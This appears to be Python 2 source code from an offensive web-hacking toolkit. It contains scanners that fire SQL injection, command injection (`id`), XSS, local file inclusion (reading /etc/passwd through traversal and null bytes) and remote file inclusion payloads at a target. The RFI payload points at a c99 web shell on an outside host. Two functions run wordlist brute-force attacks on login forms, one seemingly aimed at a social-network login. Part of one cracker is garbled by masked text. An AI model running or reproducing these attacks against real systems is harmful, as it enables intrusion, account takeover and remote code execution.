def SQLScan(self): global vuln_links Results = "" error_msgs = [ "error", "sql error", "syntax error", "invalid", "warning" ] SQLbr = browser() for link in vuln_links: l = link.split("=")[0] for i in range(-1, 999999): url = self.target + "/" + l + "=" + str(i) try: site = SQLbr.open(url) src = site.read() for msg in error_msgs: if msg in src.lower(): Results += url + "\n" print "[+] " + url except: pass time.sleep(1) return Results
def CMDScan(self): global vuln_links Results = "" bash_msgs = ["uid=", "permission denied"] payload = "id" CMDbr = browser() for link in vuln_links: l = link.split("=")[0] url = self.target + "/" + l + "=" + payload try: site = CMDbr.open(url) src = site.read() for msg in bash_msgs: if msg in src.lower(): Results += url + "\n" print "[+] " + url except: pass time.sleep(1) return Results
def grab_links(self): br = browser() try: site = br.open(self.target) src = site.read() soup = BeautifulSoup(src, "lxml") links = soup.find_all('a') for link in links: l = link.get("href") if "?" in l: vuln_links.append(l) except: pass
def crack(self): print "\n[+] Target: " + self.target if self.verbose == 1: print "[!] Checking proxy..." if self.proxy != "": hst, prt = parse_address(self.proxy) pr = proxy(hst, prt, self.proxy_type) if pr.set_browser_proxy() == True: print "[+] Proxy: " + self.proxy else: print "[-] Invalid or dead proxy" else: print "[-] Proxy not set" print if self.verbose == 1: print "[!] Connecting to target...\n" br = browser() try: br.open(self.login_page) if self.verbose == 1: print "[!] Checking wordslists..." passwords = open(self.wordslist, "r").readlines() if self.verbose == 1: print "[!] Attack started...\n" for word in passwords: password = word.replace("\n", "") print "[*] Trying: " + password br.select_form(nr=0) br.form['email'] = self.target br.form['pass'] = password resp = br.submit() if "login_attempt" not in resp.geturl(): self.results = "Password is " + password print "[+] " + self.results break except: self.results = "Failed to crack password" print "[-] Failed to connect to target" print "[-] " + self.results + "\n"
def grab_links(self): print "\n[+] Target: " + self.target if self.verbose == 1: print "[!] Checking proxy..." if self.proxy != "": hst, prt = parse_address(self.proxy) pr = proxy(hst, prt, self.proxy_type) if pr.set_browser_proxy() == True: print "[+] Proxy: " + self.proxy else: print "[-] Invalid or dead proxy" else: print "[-] Proxy not set" print if self.verbose == 1: print "[!] Connecting to target..." br = browser() try: site = br.open(self.target) src = site.read() soup = BeautifulSoup(src, "lxml") links = soup.find_all('a') if self.verbose == 1: print "[!] Found %d links\n" %(len(links)) for link in links: print link.get("href") except: self.results = "No results found" print "[-] Failed to connect to target" print "[-] " + self.results + "\n"
def XSSScan(self): global vuln_links Results = "" xss_msg = "Hello world!" payload = "<script>alert(\"Hello world!\");</script>" XSSbr = browser() for link in vuln_links: l = link.split("=")[0] url = self.target + "/" + l + "=" + payload try: site = XSSbr.open(url) src = site.read() if xss_msg in src.lower(): Results += url + "\n" print "[+] " + url except: pass time.sleep(1) return Results
def RFIScan(self): global vuln_links Results = "" shell = "c99shell" payload = "http://www.defcont4.hypersite.com.br/shell/c99.txt?" RFIbr = browser() for link in vuln_links: l = link.split("=")[0] url = self.target + "/" + l + "=" + payload try: site = RFIbr.open(url) src = site.read() if shell in src.lower(): Results += url + "\n" print "[+] " + url except: pass time.sleep(1) return Results
def crack(self): print "\n[+] Target: " + self.target if self.verbose == 1: print "[!] Checking proxy..." if self.proxy != "": hst, prt = parse_address(self.proxy) pr = proxy(hst, prt, self.proxy_type) if pr.set_browser_proxy() == True: print "[+] Proxy: " + self.proxy else: print "[-] Invalid or dead proxy" else: print "[-] Proxy not set" print if self.verbose == 1: print "[!] Connecting to target..." br = browser() try: br.open(self.login_page) if self.verbose == 1: print "[!] Checking wordslists..." usernames = open(self.userslist, "r").readlines() passwords = open(self.wordslist, "r").readlines() if self.username != "": for word in passwords: password = word.replace("\n", "") print "[*] Trying: " + password br.select_form(nr=0) br.form[self.user_form] = self.username br.form[self.pass_form] = password resp = br.submit() if ("login" not in resp.geturl()) or ("attempt" not in resp.geturl()): self.results = "Password is " + password print "[+] " + self.results break else: for user in usernames: username = user.replace("\n", "") print "[*] Trying username: "******"\n", "") print "[*] Trying password: "******"login" not in resp.geturl()) or ( "attempt" not in resp.geturl()): self.results = "Login is %s:%s" % (username, password) print "[+] " + self.results break except: self.results = "Failed to crack password" print "[-] " + self.results
def LFIScan(self): global vuln_links Results = "" root = "root:x:" password_file = "/etc/passwd" payloads = ["..", "../"] LFIbr = browser() for link in vuln_links: l = link.split("=")[0] url = self.target + "/" + l + "=" try: site = LFIbr.open(url + password_file) src = site.read() if root in src.lower(): Results += url + "\n" print "[+] " + url else: site = LFIbr.open(url + password_file + "%00") src = site.read() if root in src.lower(): Results += url + "\n" print "[+] " + url else: site = LFIbr.open(url + payloads[0] + password_file) src = site.read() if root in src.lower(): Results += url + "\n" print "[+] " + url else: site = LFIbr.open(url + payloads[0] + password_file + "%00") src = site.read() if root in src.lower(): Results += url + "\n" print "[+] " + url else: for i in range(10): site = LFIbr.open(url + str(payloads[1] * i) + payloads[0] + password_file) src = site.read() if root in src.lower(): Results += url + "\n" print "[+] " + url else: site = LFIbr.open(url + str(payloads[1] * i) + payloads[0] + password_file + "%00") src = site.read() if root in src.lower(): Results += url + "\n" print "[+] " + url except: pass time.sleep(1) return Results